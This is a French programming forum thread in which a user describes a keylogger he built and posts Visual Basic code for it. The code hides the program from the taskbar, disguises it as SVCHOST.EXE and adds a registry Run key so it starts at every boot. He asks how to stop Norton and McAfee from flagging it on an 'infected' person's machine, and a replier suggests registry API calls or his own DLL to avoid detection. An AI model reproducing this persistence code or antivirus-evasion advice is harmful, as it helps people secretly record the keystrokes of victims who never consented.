Accueil > Forum > > > > HELP > REGEDIT & AV (Norton, McAfee, etc.) = GROS SOUCIS!
HELP > REGEDIT & AV (Norton, McAfee, etc.) = GROS SOUCIS!
lundi 6 octobre 2003 à 02:01:25 |
HELP > REGEDIT & AV (Norton, McAfee, etc.) = GROS SOUCIS!

paprikarmasutra
|
Salut, J'ai créé un prog (keylogger) qui a la capacité de voir si une clé lui est attribuée dans REGEDIT afin qu'il se lance automatiquement à chaque démarrage de Windows. S'il n'y en a pas, il en crée une. Le problème, c'est que Norton, McAfee et compagnie détectent un script "malicieux" dans mon prog, et demandent s'il faut exécuter ce script ou non. Du coup, si ça fait ça chez la personne infectée, ça risque de poser quelques problèmes... Auriez-vous une solution à mon problème pour contourner ces foutus (bons) AV? Merci, @ bientôt. Et excusez-moi d'avance si la réponse se trouve quelquepart sur le site, mes recherches n'ont pas été fructueuses jusqu'à maintenant...
|
|
lundi 6 octobre 2003 à 08:25:59 |
Re : HELP > REGEDIT & AV (Norton, McAfee, etc.) = GROS SOUCIS!

BruNews
|
Indique comment tu ecris dans registres si tu veux qu'on trouve une solution. BruNews, ciao...
|
|
lundi 6 octobre 2003 à 13:31:31 |

paprikarmasutra
|
Voilà comment j'écris dans le registre : Private Sub Form_Load()
Set Me.Icon = Nothing App.TaskVisible = False
Dim WshShell As Variant
Set WshShell = CreateObject("Wscript.Shell")
On Error GoTo CREATEKEY
Text2.Text = WshShell.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SVCHOST")
Exit Sub
CREATEKEY:
Set WshShell = CreateObject("Wscript.Shell")
WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SVCHOST", "C:\WINDOWS\SVCHOST.EXE"
End Sub
|
Je précise que SVCHOST.EXE est le nom de mon programme afin qu'il soit "camouflé" dans les services. Voilà, j'espère que quelqu'un va pouvoir m'aider là! =) Merci d'avance.
|
|
lundi 6 octobre 2003 à 13:44:25 |

BruNews
|
Alors normal car tu executes du script, il faut ecrire avec API. Tu peux aussi te servir de ma dll qui est plus simple d'emploi, se trouve dans mes sources. BruNews, ciao...
|
|
lundi 6 octobre 2003 à 14:02:38 |

paprikarmasutra
|
J'ai vu ce que ça donnait avec ta dll, mais je trouve ça un peu complexe. Est-ce que tu peux me donner un exemple avec API? As-tu un exemple simple, juste pour l'écriture au moins?
Le truc, c'est que je voudrais éviter d'ajouter des dll au programme, parce que c'est quand même un truc qui est censé s'installer avec les composants existants sur la machine.
Voilà, merci pour ton aide en tout cas! =)
|
|
lundi 6 octobre 2003 à 14:10:55 |

BruNews
|
Desole mais je ne fais que C ou ASM (comme la dll). Note que la dll n'a pas a etre enregistree, te suffit de la poser dans dossier de ton exe. BruNews, ciao...
|
|
Cette discussion est classée dans : help, regedit, norton, av, mcafee
Répondre à ce message
Sujets en rapport avec ce message
HELP !!!REGEDIT [ par TheHacker ]
TheHacker Salut, j'avais vu une fois une source suyr VBfrance mias helas je ne la trouve + alors si son auteur ou qqun d'autre connait le link je suis
HELP! Macro Excel et Requete SQL HELP ! [ par titosolteron ]
Bonjour j'essaye actuellement de construire une macro VB sous excel pour rapatrier les donnees d'un AS400j'ai constuit un fichier .dqy avec la requete
Help: VB+GENERATEUR SQL [ par abracadabra ]
Salut tout le monde,J'ai un petit probleme dans le "Générateur de requête SQL" dans VB...Je n'arrive pas à lier ma requête à une variable DataCombo de
PHP Help me ! :-) [ par MEGATRIX ]
Salut; j'ai un ti pbl avec le php je me permet de poser cette question ici car je suis de base programmeur vb!Bon alors mon pbl c que je ne sais po co
HELP! detection type de donnee dans une cellule HELP! [ par titosolteron ]
bonjour,j'ai une colonne rempli avec des donnees diverses dans certaines cellules j'ai que 13 chiffres ces cellules la doivent etre copies meme ligne
help c simple et urgent !!!! [ par Mrx3 ]
je recherche comment définir le mois et le jour en vbscript par exemple pour afficher une boite de dialogue à une certaine date dans l'année (et sa qu
help creation de control activeX [ par norvaal ]
NBCa)Comment peut on modifier une propriété d'une form sur laquelle on ajout sont ocx que l'on vient de créer via cet ocxex: je voudrais lorsque je po
Help!! autorisation d'un partager [ par yotaaa ]
Bonjourje voudrai vous demander si quelqu'un sait comment gerer la securite d'un dossier partager??je veux dire par la autoriser des utilisateurs prec
help fichier cls [ par jesusonline ]
j'aimerais pouvoir utiliser la classe proposer dans cette page http://www.codeproject.com/useritems/TimerComputerShutdown.asp quand je dezippe le fich
Méthode FaxServer.Connect Help me [ par labout ]
laboutSous Windows 2000 et Vb6Voici mon codeJ'utilise les dll FAXCOM.DLL et MDOSYS.DLLDim FaxDocument As ObjectSet Faxserver = CreateObject("FaxServer
Livres en rapport
|
Derniers Blogs
ASYNC/AWAIT: COMPRENDRE COMMENT CA MARCHEASYNC/AWAIT: COMPRENDRE COMMENT CA MARCHE par fathi
Tout le monde est unanime pour dire que la programmation multi-thread et asynchrone est en train de devenir un sujet incontournable. Beaucoup de choses sont arrivées avec le framework 4 pour le code parallèle (TPL, PLinq,.) et bientôt, on va avoir l...
Cliquez pour lire la suite de l'article par fathi PAS D'INTELLITRACE SUR MON SITE WEB DANS IIS !PAS D'INTELLITRACE SUR MON SITE WEB DANS IIS ! par Etienne Margraff
J'ai récemment eu un problème pour obtenir l'intelliTrace sur un site web dans IIS. Il n'y avait pas de message d'erreur, rien dans le journal d'évènement Windows, et après 3 appels à une voyante, 2 visites chez un marabou, j'ai failli me résign...
Cliquez pour lire la suite de l'article par Etienne Margraff OFFICE 365 - SHAREPOINT ONLINE, QUELQUES LIMITATIONSOFFICE 365 - SHAREPOINT ONLINE, QUELQUES LIMITATIONS par junarnoalg
De nombreuses entreprises font le choix de SharePoint Online, service fourni au travers de l'offre de Microsoft Office 365. S'il est vrai que ce choix apporte un grand nombre d'avantages; rapidité de mise en œuvre, disponibilité, large couvertu...
Cliquez pour lire la suite de l'article par junarnoalg PRéSENTATION DES API REST DE WINDOWS AZURE : LISTER LES COMPTES DE STORAGEPRéSENTATION DES API REST DE WINDOWS AZURE : LISTER LES COMPTES DE STORAGE par richardc
http://www.c2idotnet.com/articles/presentation-des-api-rest-de-windows-azure-lister-les-comptes-de-storage
Désolé pour "toto", mais c2i existait avant blogs.developpeur.org et c'est mon site "officiel" ;-) ...
Cliquez pour lire la suite de l'article par richardc
Logiciels
DocTranslate (V3.1.0.0)DOCTRANSLATE (V3.1.0.0)DocTranslate est un traducteur de document Microsoft Word, PowerPoint et Excel. Il permet d'autom... Cliquez pour télécharger DocTranslate Tribler (2012)TRIBLER (2012)Tribler est un client pair à pair (P2P/Peer-to-Peer) open source avec la capacité de regarder des... Cliquez pour télécharger Tribler OneSwarm (2012)ONESWARM (2012)Le peer-to-peer qui protège votre vie privée, c'est OneSwarm.
Ce logiciel de peer-to-peer crypté... Cliquez pour télécharger OneSwarm PONAMEDIA PREMIUM - HELLLOOO FLASH DEMO (V8.4)PONAMEDIA PREMIUM - HELLLOOO FLASH DEMO (V8.4)PONAMEDIA TV DEVIENS HELLLOOO FLASH
LA TV SUR VOTRE ORDINATEUR.
Toute une plateforme Multi... Cliquez pour télécharger PONAMEDIA PREMIUM - HELLLOOO FLASH DEMO Academy System (17.2.1.0)ACADEMY SYSTEM (17.2.1.0)Logiciel de gestion des établissements.
- élèves/étudiants (inscription, dossier, absence...)
-... Cliquez pour télécharger Academy System
|